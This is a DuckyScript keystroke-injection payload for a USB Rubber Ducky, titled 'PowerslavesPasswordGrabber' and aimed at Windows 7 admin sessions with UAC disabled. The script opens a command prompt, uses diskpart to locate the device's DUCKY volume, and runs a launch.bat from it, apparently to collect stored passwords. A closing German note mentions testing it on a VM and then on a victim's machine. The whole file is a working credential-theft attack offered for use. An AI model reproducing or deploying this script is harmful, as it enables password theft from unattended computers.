REM	   Author: Powerslave / Language/Type: DuckyScript/ASCII / Version: 0.9.3 Beta
REM	   *Original Script and app collection from Mr. Grey @ Hak5 Forums.
REM	   Title: PowerslavesPasswordGrabber for Rubber Ducky (Composite Ducky Firmware)
REM
REM	   Description: check the REAME.nfo, its made with love, i swear
REM
REM   a ______                            _
REM    (_____ \                          | |
REM     _____) )__  _ _ _ _____  ____ ___| | _____ _   _ _____
REM    |  ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |
REM    | |   | |_| | | | | ____| |  |___ | |/ ___ |\ V /| ____|
REM    |_|    \___/ \___/|_____)_|  (___/ \_)_____| \_/ |_____).ch
REM
REM                                                            Product
REM Target: Windows 7 x64 / no UAC / Admin Login
REM
REM
REM Starting ducky script -- Set the start DELAY to 1000 if no Driver Install is needed.
DELAY 8000
ESCAPE
CONTROL ESCAPE
DELAY 10
STRING cmd
DELAY 100
ENTER
DELAY 50
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
DELAY 50
ENTER
STRING %DUCKYdrive%\exec\launch.bat
ENTER

REM Notizen an mich: (You don't have to understand that ;-)
REM Muss noch getestet werden an VM und später an neutraler maschine. Mal sehen wer sich als Opfer anbietet.
